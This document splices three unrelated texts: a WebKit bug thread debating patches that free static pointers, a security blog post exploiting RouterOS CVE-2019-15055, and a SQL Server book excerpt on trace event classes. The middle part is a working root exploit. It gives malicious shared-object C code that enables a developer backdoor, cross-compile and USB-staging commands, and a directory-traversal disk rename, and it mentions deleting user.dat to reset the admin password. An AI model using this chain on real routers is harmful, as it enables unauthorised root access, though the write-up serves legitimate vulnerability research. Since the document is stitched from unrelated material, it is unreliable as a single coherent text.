> Since values stored in this pointer will be freed, I
> think we want this to use some explicit style like OwnPtr rather than plain
> assignment.

Could you show me an example here?

Anyway, a plain QtLauncher now frees 761 objects (without crashing). After some browsing it grows to 812.

(In reply to comment #12)
> - using DEFINE_GLOBAL (WebCore/platform/StaticConstructors.h)
> * these variables cannot be freed, since they are allocated on the heap
> * workaround: wrapper classes
> Any better idea?
> * fortunately it is a rarely used directive (only two classes: AtomicString
> and QualifiedName))

Adam, if you really want, I can stop this task. I don't want to force anything if you don't like it.

(In reply to comment #14)
> >)

I see your second patch is special-casing them, but it is not deleting them: as you are not explicitly calling the destructor, you are just deleting them as normal.

> Adam, if you really want I can stop this task. I don't want to force anything
> if you don't like it.

No, feel free to continue. I just have doubts that this method of dealing with it will be robust enough to reach the stated goal without incurring a lot of new requirements.

Created attachment 34265 [details] Third patch

The whole thing is in much better shape. I hope you will like it.

In general I don't really like this idea. Ripping things down during quit is only useful for leak debugging. On Mac OS X we've not had this trouble with our leak debugging tools, to my knowledge. I'm sad that we would have to jump through hoops for valgrind. But maybe I'm missing something obvious. Darin Adler is likely your best bet for a reviewer. He's still the best source for approval on such large sweeping changes. The man has more C++-fu in his pinky finger than all of me does. ;)

Created attachment 34549 [details] Fourth patch

Actually WebCore is much better written than I expected, so unifying the constant pointer handling is not that hard.
After starting and quitting QtLauncher, the leak was reduced from:

==18154== LEAK SUMMARY:
==18154==    definitely lost: 66,632 bytes in 496 blocks.
==18154==    possibly lost: 25,536 bytes in 7 blocks.
==18154==    still reachable: 241,690 bytes in 5,595 blocks.
==18154==    suppressed: 0 bytes in 0 blocks.
Number of loss records: 295

To:

==6905== LEAK SUMMARY:
==6905==    definitely lost: 344 bytes in 2 blocks.
==6905==    indirectly lost: 20 bytes in 1 blocks.
==6905==    possibly lost: 744 bytes in 3 blocks.
==6905==    still reachable: 117,418 bytes in 2,859 blocks.
==6905==    suppressed: 0 bytes in 0 blocks.
Number of loss records: 131

And 50k of this space is a debug structure used by StructureID-s.

Is there a specified WebKit name pattern for global variables? In this patch, I've seen both "foo" (same as local variables) and "gFoo". I use "g_Foo" in my code, but Eric says it's wrong. So what pattern should be used for global variables?

(In reply to comment #20)
> Is there a specified webkit name pattern for global variables? In this patch,
> I've seen both "foo" (same as local variables) and "gFoo". I use "g_Foo" in my
> code, but Eric says it's wrong. So what pattern should be used for global
> variables?

correction: should be "g_foo"

Comment on attachment 34549 [details] Fourth patch

> +#include "wtf/StaticPtr.h"

Includes of wtf from WebCore use angle brackets. <wtf/StaticPtr.h>, not "wtf/StaticPtr.h".

> +static WTF::StaticPtr<JSGlobalData> sharedInstancePtr;.

A major reason this patch is unacceptable is that it creates many global objects with destructors. I didn't review further because that's a major problem with the current version.

>.

I have realized why DEFINE_STATIC_LOCAL is defined this way (probably DEFINE_GLOBAL is an even better example, which uses placement new to hide the destructor), so the destructor of WTF::StaticPtr is empty of course, and never intended to do anything...
(In reply to comment #23)
> I have realized why DEFINE_STATIC_LOCAL (probably DEFINE_GLOBAL is even better
> example, which use placement new to hide the destructor) defined, so the
> destructor of WTF::StaticPtr is empty of course, and never intended to do
> anything...

Please check and see what the compiler generates for this before giving a patch that deploys it in tons of places. I'm pretty sure that an empty virtual function will indeed generate a static destructor, although a pointless empty one. There's a good chance it will even change the virtual pointer on the object. Anyway, if the technique works that's fine, but it's pointless to review a patch that deploys the technique before you've tested it!

(In reply to comment #2)
> (In reply to comment #1)
> > Created an attachment (id=34058)
...

(In reply to comment #25)
> (In reply to comment #2)
> > (In reply to comment #1)
> > > Created an attachment (id=34058) [details]
...

correction: atexit pushes the destructor to the onexit stack

A branch has been set up on Gitorious where I tried to extend the patch(es) for all statics: git@gitorious.org/~balazs/qtwebkit/balazs-clone/commits/free-static-ptrs. Actually it is tested only in interpreter mode of JSC (DEFINES='ENABLE_JIT=0 ENABLE_YARR_JIT=0' at the end of the build-webkit ... command line), because I had some problems with JIT.

Created attachment 38848 [details] Fifth patch

Sorry for my long silence, I was away on holiday. From the start of this week I am back again and have rewritten most of the core parts of the patch. Global pointers are changed to structures (these structures are allocated in .bss (according to objdump). They are simple C structures -> no constructors or destructors are called (tested by gdb)).
Now every structure has its own separate file (). The new files are:

- contains a C struct: create mode 100644 JavaScriptCore/wtf/GlobalPtr.h
- contains a C++ class: create mode 100644 JavaScriptCore/wtf/LocalStaticArrayPtr.h
- contains a C++ class: create mode 100644 JavaScriptCore/wtf/LocalStaticPtr.h
- freeing static variables: create mode 100644 JavaScriptCore/wtf/StaticPtrBase.cpp
- contains a C struct: create mode 100644 JavaScriptCore/wtf/StaticPtrBase.h

There is no inheritance, since a struct is converted to a class if inheritance is applied (was strange for me, but it is true). Instead, StaticPtrBase must be the first member of its descendants. The descendants must not contain any virtual method (to avoid a vptr).

Darin, could you take a look at the patch, please? I had a question on webkit-dev about whether I should unify the names of global variables along with this work. What is your opinion?

(In reply to comment #29)
> I had a question on webkit-dev about whether I should unify the names of
> global variables along with this work. What is your opinion?

I think it's best to do renames separately. I'm always tempted to do such things together, and it tends to make patches harder to review, and if there is a problem later, more conflicts and difficulty rolling a change out.

(In reply to comment #30)
> > You say "sometimes it is good to free statically allocated pointers". When?

One case is that webkit is used as a dll, and the dll can be loaded and unloaded multiple times. Those global pointers will leak in this case. But I guess an OwnPtr or something should be good for this purpose. The dtors will be called when the dll is unloaded. Also there is a c_exit or _cexit in MSVC to explicitly call all dtors for global/static objects. When constructing a global object, the compiler will add the dtor to the exit stack with atexit. So the order of destruction is the reverse of the order of construction.
And explicitly calling c_exit() also clears the stack, so there is no need to worry about calling a dtor twice. Is there a compiler that doesn't guarantee this?

ENABLE(FREE_STATIC_PTRS) is good for not affecting people who don't want to use it. But GlobalPtr must be freed by an explicit call to deletePtr(). That's not an easy life, considering a coding guideline that requires using the same macros for global objects.

What are the goals?
1. construct and destruct global objects in a safe order
2. ability to free all memory allocated by global pointers
3. ability to leave those global pointers as leaks

We can just define a GlobalPtr the same as OwnPtr, except with a compile-time switch for deleting the object in the destructor or not. That would be simple but enough for most ports, I guess.

(In reply to comment #32)
> One case is that webkit is used as a dll, and the dll can be loaded and
> unloaded multiple times.

Is there someone who wants to use WebKit this way? Is the global variable issue the only issue preventing this? I think the project to make it so you can load and unload WebKit multiple times is a pretty big project. And we should not do it unless we have to.

(In reply to comment #33)
> (In reply to comment #32)
> > One case is that webkit is used as a dll, and the dll can be loaded and
> > unloaded multiple times.
>
> Is there someone who wants to use WebKit this way?

Yes. For example, webkit is used to render html pages in other applications, like a COM object provider, or in other ways.

> Is the global variable issue the only issue preventing this?
> I think the project to make it so you can load and unload WebKit multiple times
> is a pretty big project. And we should not do it unless we have to.

There may be other resources to consider, but those static global pointers are hard to free explicitly outside of WebCore. Loading/unloading the webkit dll multiple times is fine except for the leaks.

(In reply to comment #30)
>?
Perhaps this patch is destined to be an experimental solution. The big question is whether it is possible to make WebKit an unloadable dll / shared object. The answer is unknown at this moment, since no one has tried it before, so no one will start to consider this as an option, because they feel it is too risky a project. We just close the way to an interesting feature without trying it.

First, I try to sort all global variables into groups: how globals are declared and used in WebKit. Is there a redundant form, or are all of them necessary (right now I have only 3 groups)?

Second, are the globals handled correctly? Some globals change their value, and we must make sure (in debug mode) their previous value is freed. Right now I found only one exception to the reversed free order: WebCore::pageCache() is allocated too early in QtLauncher (via setMaximumPagesInCache), and its destructor frees a timer object. The call to timer::stop() causes a segmentation fault at that time.

I don't insist on the current form of global handling. If all globals are declared as templates, anyone can change their behaviour (and make GlobalPtr a class if someone prefers that way).

The patch really helps valgrind: a simple QtLauncher start-exit cycle left around 300k of leaks, and this is reduced to 100k. The number of loss records decreased from 400 to 100. It is much easier to find real leaks in those 100 loss records (especially because the remaining loss records belong to fontconfig and Qt internals).

There is one piece of really good news: the work started 1.5 months ago, and I have had no trouble upgrading it to the most recent version so far. It looks like maintaining this patch is not hard work (hopefully).

Created attachment 39334 [details] Sixth patch

Just a regular update. Many new pointers are freed now.

Comment on attachment 39334 [details] Sixth patch

I really dislike the direction this is going: adding many new classes and lots of complexity.
And lots of code that won't compile on most platforms, which will cause platform-specific build failures. I don't think this is worth it.

> +#include "wtf/GlobalPtr.h"

Includes of wtf should be: #include <wtf/GlobalPtr.h>

I think GlobalPtr should probably be named GlobalOwnPtr and have an interface as close as possible to the OwnPtr class, since it's a sort of hybrid between OwnPtr and a raw pointer.

> +WTF::GlobalPtr<JSGlobalData> sharedInstancePtr;

Items in the WTF namespace are supposed to have "using WTF::GlobalPtr" in the header and not be qualified by WTF explicitly in code.

I don't understand why it's better to move the actual pointer outside of a function. It still seems good programming style to scope a global variable inside a function when that's possible.

> +#include "wtf/FastMalloc.h"
> +#include "wtf/StaticPtrBase.h"

Need to use angle brackets for these includes.

> +// All HashTables are static and generated by a script (see the comment in the header file)

Need a period at the end of this sentence.

> +struct HashTableDeleter {
> +public:

No need for "public" since this is a struct. A struct where everything is public should omit the public: part.

> + WTF::StaticPtrBase m_base;

No WTF:: prefix.

> + HashTable* m_hashTable;
> +
> + static void free(void* ptr)
> + {
> + reinterpret_cast<HashTableDeleter*>(ptr)->m_hashTable->deleteTable();

This should be a static_cast, not reinterpret_cast.

> +#if ENABLE(FREE_STATIC_PTRS)
> + HashTableDeleter* deleter = reinterpret_cast<HashTableDeleter*>(fastMalloc(sizeof(HashTableDeleter)));

This should be a static_cast, not a reinterpret_cast. Why use fastMalloc here and not new?

> +// The classes here are defined as structs to avoid
> +// the call of C++ constructors and destructors

This comment and technique are incorrect. Using the keyword "struct" instead of "class" has no effect on the presence of C++ constructors and destructors.
There are only two differences between class and struct:

1) Default visibility is public for struct, private for class.
2) Visual Studio treats struct and class as distinct for type identity and name mangling. This goes against the C++ standard, but requires that we be consistent if we want compatibility with that compiler.

Otherwise, they are identical, and struct vs. class has no effect on whether something has a non-trivial constructor and destructor.

> + // Has NO C++ constructor

The terminology here is strange. Why say "C++" when all this code is C++? The comments in this file are not clarifying what this class is for. They need to say that it's intended to be used for global data. And to satisfy our requirement that there be no global destructors in the WebKit projects if FREE_STATIC_PTRS is not set, they must have no non-trivial destructor. And to satisfy our requirement that there be no global constructors in the WebKit projects, they must have no non-trivial constructor. Some of that needs to be said.

> + void set(PtrType);
> + void setPtr(PtrType);

I have no idea how set differs from setPtr. It does not seem to be good design to have both, but perhaps there is some real difference here. If so, we need to use a more descriptive name. For example, in other places we use terms like "adopt". Somehow I guess setPtr means "take this pointer value, but not ownership". And if so, it seems very strange design to have a pointer that sometimes owns what it points to, and other times does not. Seems like overkill to have that. If it's not going to own something, then we can use a raw pointer.

> + void operator=(PtrType);

And we also have an = operator. Why have all three of these?

> + void deletePtr();

What is this for?

> +#if ENABLE(FREE_STATIC_PTRS)
> + StaticPtrBase m_base;
> +#endif

This makes every global pointer 8 bytes. Is this really the best we can do?

> + delete reinterpret_cast<GlobalPtr<T>*>(ptr)->get();

This should be a static_cast, not reinterpret_cast.
> + void setFree(StaticPtrBaseFree func)

The type name StaticPtrBaseFree is not so good, because "free" is a verb or adjective, not a noun. Types normally should be nouns. Instead of "func" please use "function". There's no need to abbreviate. Except in certain cases where something needs to be

> + // Detect memory leaks
> + ASSERT(!m_ptr || (m_ptr == value));

The comment here is confusing. How does this comment "detect memory leaks"? I think it's strange to have this function allow you to set the same value multiple times, given that the set operation is really "give ownership". Why do we need that flexibility? I think the set function should probably be named "adopt" if it is taking ownership.

> +template<typename T>
> +ALWAYS_INLINE void GlobalPtr<T>::operator=(PtrType value)

Do we really need this? I think assignment is confusing when it transfers ownership of a raw pointer, so it would be best to leave this out unless it's really needed.

> +// Wrapper class for arrays, which assigned to a static variable
> +// By default, it behaves like a simple C++ array without performance overhead

These comments need periods. The comment leaves out what really matters, which is what this class is for! It says that by default it works as a simple array, but what does it do when not default?

> + delete[] reinterpret_cast<LocalStaticArrayPtr<T>*>(ptr)->m_ptr;

This should be static_cast.

> + while (current) {
> + // Some pointers (i.e: HashTableDeleter) frees themself

"Some pointers free themselves." would be correct grammar. The Latin abbreviation "i.e." means "in other words". I think you mean "for example" here, and that should be written either as "for example" or as "e.g." if you want to use the Latin abbreviation. The comment is *almost* helpful, but is just a bit too obscure. The comment needs to be more explicit and say clearly that we follow the next pointer before calling free, because in some cases the free function will delete the item including the next pointer.
> + ptr->m_free(reinterpret_cast<void*>(ptr));

There is no need for this cast at all.

> + // Perhaps a double linked list may be suitable if remove() called frequently

This is a confusing comment, because it does not say what the tradeoff is. Why aren't we using a doubly-linked list now? I suggest we not even include the remove() function unless we need it. And if we need it we should have the doubly-linked list from the start, unless there's a clear reason we should not.

> + StaticPtrBase* current = head();
> + if (current == this) {
> + m_head = current->next();
> + return;
> + }
> +
> + while (current->next() != this) {
> + current = current->next();
> + ASSERT(current);
> + }
> + current->m_next = next();
> +}

It's a little strange to use next() to get the pointer and then m_next to set it. There's no abstraction there, just slight confusion, by having some of each. There are cleaner ways to write the linked list algorithms that require fewer special cases and don't fetch current->next() multiple times, but this is probably OK as-is.

> + // Methods
> + void append();
> + void remove();

This comment is not good. First of all, "methods" is not a C++ term, and second, what does that comment add?

> + static StaticPtrBase* m_head;
> + StaticPtrBase* m_next;
> + StaticPtrBaseFree m_free;
> +
> + static inline StaticPtrBase* head() { return m_head; }
> + inline StaticPtrBase* next() { return m_next; }

The use of inline here does no good -- functions defined inside a C++ class are always treated as if they had "inline" specified, so there's no point in saying it explicitly. It doesn't make sense to have both public data members and public function members that get at that same data. Either the data should be private, or the functions should be omitted.

> +#if !PLATFORM(QT)
> delete data;
> +#endif

Why is Qt a special case here? This is very confusing!
> --- a/WebCore/WebCore.pro
> +++ b/WebCore/WebCore.pro
> @@ -1044,6 +1044,7 @@ SOURCES += \
> html/HTMLViewSourceDocument.cpp \
> html/ImageData.cpp \
> html/PreloadScanner.cpp \
> + html/TimeRanges.cpp \
> html/ValidityState.cpp \
> inspector/ConsoleMessage.cpp \
> inspector/InspectorBackend.cpp \
> @@ -2629,7 +2630,6 @@ contains(DEFINES, ENABLE_VIDEO=1) {
> html/HTMLMediaElement.cpp \
> html/HTMLSourceElement.cpp \
> html/HTMLVideoElement.cpp \
> - html/TimeRanges.cpp \
> platform/graphics/MediaPlayer.cpp \
> rendering/MediaControlElements.cpp \
> rendering/RenderVideo.cpp \

Can you make the above change in a separate check-in first?

> +#if !ENABLE(FREE_STATIC_PTRS)
> ~IdentifierRep()
> {
> // IdentifierReps should never be deleted.
> ASSERT_NOT_REACHED();
> }
> +#endif

This is a good example of something that's probably wrong. I think there is storage to be freed here. Simply changing things so it compiles means that we have a storage leak in the FREE_STATIC_PTRS case. This patch is way too big, doing too much at once. It is easy to miss mistakes like this in a patch of this size.

> static PassRefPtr<CSSInitialValue> createExplicit()
> {
> - static CSSInitialValue* explicitValue = new CSSInitialValue(false);
> - return explicitValue;
> + DEFINE_STATIC_LOCAL(CSSInitialValue, explicitValue, (false));
> + return &explicitValue;
> }
> static PassRefPtr<CSSInitialValue> createImplicit()
> {
> - static CSSInitialValue* explicitValue = new CSSInitialValue(true);
> - return explicitValue;
> + DEFINE_STATIC_LOCAL(CSSInitialValue, explicitValue, (true));
> + return &explicitValue;
> }

These kinds of changes should go in first, in a separate patch.

> - delete defaultStyle;
> - delete simpleDefaultStyleSheet;
> + defaultStyle.deletePtr();
> + simpleDefaultStyleSheet.deletePtr();
> defaultStyle = new CSSRuleSet;
> simpleDefaultStyleSheet = 0;

This is a bad idiom.
The global pointer is a variation on OwnPtr, and the right idiom there is to delete things automatically when assigning a new value. Having an explicit deletePtr makes it too easy to use it wrong.

It's extremely important to have a patch that creates the mechanism separate from a patch that deploys it in so many places. By making a single large patch you're making it very hard to review, and there are lots of things you will have to change now based on my feedback. I can't read the rest of this right now.

*** Bug 30408 has been marked as a duplicate of this bug. ***

I believe that the value of being able to clean up static pointers goes well beyond reporting memory leaks. There are operating systems that run on embedded devices that use WebKit and that run all applications in one process space. They unload the WebKit library, but any unfreed memory is leaked until the device is reset. On these devices, snapshots of WebKit have been customized to free these pointers. It would be nice to have this code merged to the trunk.

There are applications that host various WebKit-based WebWidgets that are created and destroyed without the application quitting. For this class of applications, deleting the static pointers on library unload is important.

Next, there is the case described in an earlier comment of resetting the state of WebKit. Also, I believe that the proposal suggested earlier by somebody to run all destructors before actually freeing the static allocations should take care of circular references and delete order, despite the fact that in a well designed class architecture the delete order of global objects should be irrelevant.

I am not saying that the default Mac build or even any platform's default build should be affected in any way by these changes, but one should have the option to make a build that supports a clean uninitialization.
Whenever something is built without provisions for clean tearing down, sooner or later problems will appear (think nuclear plants and nuclear waste).

Created attachment 41886 [details] Proposed Partial Patch

This topic appears to be pretty controversial. It appears that there is not much value, at least for the Mac version of WebKit, in making WebKit clean up its singletons before being unloaded. Since a large change appears to be expensive in terms of development and review time, and risky enough to be found unjustifiable for Apple, I propose this small, safe change that does not solve the whole problem, but can constitute a first step towards solving it. My final goal is to have global resources (such as caches, custom memory management maps, default stylesheets, etc.) implemented in such a way that after the last WebKit page, frame, document, script object, worker thread, etc. has been deleted, these resources can be freed in any order; thus they can be implemented as global variables, or via global smart pointers, etc. if one wanted to. I plan to provide macros for declaring and defining these global resources. I also plan that by default these macros shall expand to pretty much the same code as is now used for the resources, so that there is no impact on performance. In the absence of any other value, this current patch provides: 1. No impact on performance if the user does not redefine the DEFINE_STATIC_LOCAL macro. 2. A slightly smaller, more consistent, yet more configurable WebKit source code, which benefits future maintainability and usability. I believe that on the basis of the above benefits alone, my patch should be accepted, regardless of whether I manage to find a solution to the underlying problem of singleton cleanup.

Comment on attachment 41886 [details] Proposed Partial Patch

It seems fine to use DEFINE_STATIC_LOCAL in one more place. And since that's all the patch does, we don't have to have any deep debate about it.
It also seems OK to allow a version of DEFINE_STATIC_LOCAL defined elsewhere to override the version in StdLibExtras.h, but I don't see any reason the two need to be done in a single patch.

> +#ifndef DEFINE_STATIC_LOCAL
> #if COMPILER(GCC) && defined(__APPLE_CC__) && __GNUC__ == 4 && __GNUC_MINOR__ == 0 && __GNUC_PATCHLEVEL__ == 1
> #define DEFINE_STATIC_LOCAL(type, name, arguments) \
> static type* name##Ptr = new type arguments; \
> @@ -40,7 +41,7 @@
> #define DEFINE_STATIC_LOCAL(type, name, arguments) \
> static type& name = *new type arguments
> #endif
> -
> +#endif
> // OBJECT_OFFSETOF: Like the C++ offsetof macro, but you can use it with classes.
> // The magic number 0x4000 is insignificant. We use it to avoid using NULL, since
> // NULL can cause compiler problems, especially in cases of multiple inheritance.

You should move the #endif here so that there's still a blank line before OBJECT_OFFSETOF.

> + * platform/ThreadGlobalData.cpp:
> + (WebCore::threadGlobalData):
> + Allocated threadGlobalData statically, not on heap such that it
> + will be destroyed when the library is unloaded.

I do not think the comment here is clear. My comment would be something more like, "Use DEFINE_STATIC_LOCAL macro instead of doing a one-off version here. Helpful because we are using DEFINE_STATIC_LOCAL to experiment with unloading the library and deallocating memory". I think these patches are OK, but the change log should talk about what they do rather than saying these give WebKit the ability to free memory when unloading. That's a big project that this patch is only a tiny part of. review- because of the minor problem with #endif and because the change log could be a lot clearer, but the patch seems fine otherwise

Created attachment 41972 [details] Allowing for override of DEFINE_STATIC_LOCAL

Per Darin's comment, I split my patch in two and I placed the appropriate comment in the ChangeLog.
I apologize for my carelessness in the previous patch proposal, which had unrelated comments in the ChangeLog as a result of reusing the log from a previous, more substantial attempt.

Comment on attachment 41972 [details] Allowing for override of DEFINE_STATIC_LOCAL

So can DEFINE_STATIC_LOCAL still eventually be removed once we no longer support this broken version of Apple's GCC? Or does this new usage make us forever dependent on this macro?

(In reply to comment #43)
> So can DEFINE_STATIC_LOCAL still eventually be removed once we no longer
> support this broken version of Apple's GCC? Or does this new usage make us
> forever dependent on this macro?

I don't think removing DEFINE_STATIC_LOCAL is a good idea, regardless of this new usage. It's true that we use it to work around a GCC bug. But we also use it to indicate the idiom of using a local variable in a way that avoids static destructors. It's better to do that than to handwrite the idiom each time. We might want to rename it, but it seems unlikely we'd want to remove it.

Comment on attachment 41972 [details] Allowing for override of DEFINE_STATIC_LOCAL

Clearing flags on attachment: 41972 Committed r50171: <> All reviewed patches have been landed. Closing bug.

i think carol's landed patch is a small part of the big thing here (?) or zoltan's implementation showed itself to be unfeasible and was "dropped" (and i missed it in the bug comments) ? commitbot landed and closed the bug by accident then if so (?) ps: sorry for bug spamming

Definitely so, reopening. We try to use one change per bug. It would be better to create a new "meta bug" and if there are multiple changes, do those in individual bugs blocking the meta bug. There is a lot of discussion in this bug, better not start over, in my opinion.
https://bugs.webkit.org/show_bug.cgi?id=27980
Rooting RouterOS with a USB Drive

Putting CVE-2019–15055 to Work

I was avoiding writing a blog about scanning a few million MikroTik routers when I noticed MikroTik patched a vulnerability. It caught my attention because, initially, only 6.46beta34 received a patch. A patch for Stable was released after I wrote this blog and a patch for Long-term is still pending. I wasn't the only one to notice the vulnerability either.

The 6.46beta34 release notes contain this line:

“system — accept only valid string for “name” parameter in “disk” menu (CVE-2019–15055);”

A quick diff of /nova/bin/diskd yielded a simple patch. The patch adds two comparisons that can branch to the “bad name” error message. The patch specifically looks for the ‘.’ and ‘/’ characters in a string. The reader can safely assume that this logic filters the name assigned to a mounted disk.

Pictured below, I've inserted a USB drive into my MikroTik router. The drive gets auto-assigned the name disk1, but an authenticated user can assign whatever they'd like. The disk name isn't purely cosmetic. It's used in the drive's file path. Filtering ‘.’ and ‘/’ from the name makes sense to defeat directory traversal vulnerabilities. I actually got really excited here and changed the drive's name to ../../../../../etc/, but that didn't do anything.

When I looked deeper into how the disk name was used internally, I quickly found the name being used to create symlinks. Specifically, RouterOS will create two symlinks. One in /rw/media/ and one in /rw/pckg/. From the image, you can see the user doesn't control the symlink's destination. Inevitably, no matter the name of the symlink, it will always point to /ram/disk%u (aka the USB's file system).

Cool. Patch analysis is fun. But how's this exploitable? After finally googling the CVE, like I should have done in the beginning, I found that FortiGuard Labs discovered this vulnerability and disclosed it on August 23rd.
They state, “Successful exploitation of this vulnerability would allow a remote authenticated attacker to delete arbitrary file [sic] on the system, which could lead to privilege escalation.”

RouterOS is mostly read-only. There are only a couple of interesting files that can actually be deleted. For example, you could delete /rw/store/user.dat and, after a reboot, the “admin” user will revert back to a blank password. Here's a quick proof of concept video:

MikroTik's forum post, pictured at the beginning of this blog, is kind of right though. Resetting the user accounts when you already have a valid account isn't that exciting. But that isn't all CVE-2019–15055 can do. In fact, I'm about to show you how to use it to get a root shell.

If you read my previous blog, RouterOS Post Exploitation, you might recall that I was able to get RouterOS's SNMP binary to load a shared object by storing it in /pckg/snmp_xploit/nova/lib/snmp/. This works because the SNMP process loops over all the directories in /pckg/ looking for shared objects to dlopen(). We can do the exact same thing here using CVE-2019–15055 and the USB's file system.

This blog's victim is a MikroTik hAP. This little guy features a USB port and it uses RouterOS MIPSBE. We'll need to cross-compile the malicious shared object to MIPS big endian. What shared object? This one:

#include <unistd.h>
#include <stdlib.h>

void __attribute__((constructor)) lol(void)
{
    int fork_result = fork();
    if (fork_result == 0) {
        execl("/bin/bash", "bash", "-c",
              "mkdir /pckg/option; mount -o bind /boot/ /pckg/option",
              (char *) 0);
        exit(0);
    }
}

extern void autorun(void)
{
    // do nothin' I guess?
    return;
}

This code is very simple. The lol() function will be invoked when the SNMP binary calls dlopen() on the shared object. The function itself creates the directory /pckg/option and mounts /boot to it. Seems a bit odd, but this will enable a backdoor that allows the devel user to telnet or ssh to a root busybox shell.
Compiling the shared object and preparing the USB drive is straightforward:

albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ ~/cross-compiler-mips/bin/mips-gcc -c -fpic snmp_exec.c
albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ ~/cross-compiler-mips/bin/mips-gcc -shared -s -o lol_mips.so snmp_exec.o
albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ mkdir -p /media/albinolobster/B463-D645/nova/lib/snmp/
albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ cp lol_mips.so /media/albinolobster/B463-D645/nova/lib/snmp/

As discussed earlier, the malicious USB is initially mounted as disk%u. Pop over to System → Disk and change the drive's name from disk1 to ../../../ram/pckg/snmp_xploit. Under the hood, you can see that the snmp_xploit directory can now be found in /pckg/.

Next head over to IP → SNMP and either enable SNMP or restart it. This will cause SNMP to load the shared object off of the USB drive. The developer backdoor should get enabled almost immediately. Once logged in through the backdoor as root, you can see the shared object loaded into SNMP's memory. A proof of concept video follows:

Remember, this vulnerability remains unfixed in RouterOS Long-term. While the attack does require authentication, RouterOS ships with default credentials, and a couple of the interfaces are vulnerable to brute-forcing. And, of course, insider threats are very real. Especially with a high-value target like an ISP router.

Finally, Tenable's disclosure policy states that releasing a patch is disclosure. Figuring out what the release candidate patch did was trivial. And if I can do it, anyone can. You need to release patches for all affected versions.
https://medium.com/tenable-techblog/rooting-routeros-with-a-usb-drive-16d7b8665f90
Troubleshooting and Analysis with Traces

The goal of SQL Trace is to help you—presumably, a DBA or database developer—analyze your system in order to either detect or solve problems. As SQL Server is such a large and complex product, using SQL Trace without knowing exactly what you want to do can sometimes feel like trying to find the proverbial needle in a very large haystack. In this section, we'll try to distill some of the lessons we've learned from doing countless traces into a solid framework upon which you can build your own tracing skill. We'll start with an overview of those event classes that we use most often, after which we'll drill into some common scenarios in which SQL Trace can help in your day-to-day work.

Commonly Used SQL Trace Event Classes

With over 170 events to choose from, the Profiler Events Selection dialog can be a bit daunting to new users. Luckily for your sanity, most of these events are not commonly used in day-to-day tracing activity, and are provided more for the sake of automated tools. In this section, we will describe the most common events that we use in our work.
- Errors and Warnings:Attention This event is usually fired when a client disconnects from SQL Server unexpectedly. The most common cause of this is a client library time-out, which is generally a 30-second timer that starts the moment a query is submitted. If queries are timing out, it's something you want to know about immediately, so this event is used frequently.
- Errors and Warnings:Exception and Errors and Warnings:User Error Message Exceptions and user error messages go hand-in-hand, and we always trace these two classes together. When a user exception occurs, both events will be fired. The Exception event will include the error number, severity, and state, whereas the User Error Message event will include the actual text of the error. We discuss these events in detail in the section “Identifying Exceptions” later in this chapter.
- Locks:Deadlock Graph and Locks:Lock:Deadlock Chain In previous versions of SQL Server, deadlocks could only be identified through the slightly obscure Deadlock Chain event. SQL Server 2005 introduces the much more usable Deadlock Graph event, which produces standard XML that Profiler is able to render into a very nice graphical output. We'll discuss this output in the “Debugging Deadlocks” section later in this chapter.
- Locks:Lock:Acquired, Locks:Lock:Released, and Locks:Lock:Escalation We use these events mainly in conjunction with working on deadlocks. They provide insight into what locks SQL Server takes during the course of a transaction, and for how long they are held. These events can also be very interesting to monitor if you're curious about how SQL Server's various isolation levels behave. Make sure, when using these events, to filter on a specific spid that you're targeting, lest you get back far too much information to process.
- Performance:Showplan XML Statistics Profile This event can be used to capture XML showplan output for queries that have run on the server you're profiling. There are actually several different showplan and XML showplan event classes, but this one is the most useful, in our opinion, as it includes actual rowcounts and other statistics data, which can help when tuning queries. This event class will be discussed in more detail in the “Performance Tuning” section.
- Security Audit (Event Category) Although this isn't an event class—but rather, a category that includes many event classes—we thought it belonged in this list because it contains a number of useful event classes to help you monitor virtually all security-related activity as it occurs on your server. This includes such information as failed login attempts (Audit Login Failed event class), access to specific tables or other objects (Audit Schema Object Access Event event class), and even when the server is restarted (Audit Server Starts and Stops event class).
Most of these event classes are designed for SQL Server’s built-in server auditing traces, described in the “Auditing: SQL Server’s Built-in Traces” section at the end of this chapter. - Security Audit:Audit Login and Security Audit:Audit Logout We specifically singled these two events out of the overall Security Audit category because they are the two events in that category that we find useful on a day-to-day basis, especially when doing performance tuning. By monitoring these events along with various query events in the Stored Procedures and TSQL category, you can more easily aggregate based on a single session. Tip Thanks to a change in SQL Server 2005 SP2, these events now fire even for pooled logins and logouts, making them even more useful than before. To detect whether or not the event fired based on a pooled connection, look for a value of 2 in the EventSubClass column. - Stored Procedures:RPC:Starting and Stored Procedures:RPC:Completed These events fire when a remote procedure call (RPC; generally, a parameterized query or stored procedure call, depending on the connection library you’re using) is executed by a client application. - TSQL:SQL:BatchStarting and TSQL:SQL:BatchCompleted These events fire when an ad hoc batch is executed by a client application. Using these in combination with the RPC event classes will allow you to capture all requests submitted to the server by external callers. Both the BatchCompleted event class and the corresponding RPC:Completed event class populate four key columns: Duration, Reads, Writes, and CPU. We discuss these in more detail in the “Performance Tuning” section later in this chapter. - Stored Procedures:SP:StmtStarting and Stored Procedures:SP:StmtCompleted Sometimes it can be difficult to determine which access path was taken in a complex stored procedure full of flow control statements. These events are fired every time a statement in a stored procedure is executed, giving you a full picture of what took place. 
Note that these events can produce an extremely large amount of data. It is, therefore, best to use them only when you've filtered the trace by either a given spid you're tracking, or a certain stored procedure's name or object ID (using the ObjectName or ObjectId columns, respectively) that you're interested in.
- Stored Procedures:SP:Recompile Stored procedure recompiles are commonly cited as a potential SQL Server performance problem. SQL Server includes a counter to help track them (SQLServer:SQL Statistics:SQL Re-Compilations/Sec), and if you see a consistently high value for this counter, you may consider profiling using this event class in order to determine which stored procedures are causing the problem. Note For more information on avoiding recompiles, see Chapter 5, “Plan Caching and Recompilation.”
- Stored Procedures:SP:Starting This event class fires whenever a stored procedure or function is called—no matter whether it is called directly by a client, or nested within another stored procedure or function. Since it does not populate the Reads, Writes, or CPU columns, this event class is not especially useful for performance tuning, but it does have its value. We use this class often for obtaining simple counts of the number of times a specific stored procedure was called within a given interval, and also for situations in which stored procedure calls are heavily nested and we need to determine exactly in which sequence calls were made that resulted in a certain procedure getting executed.
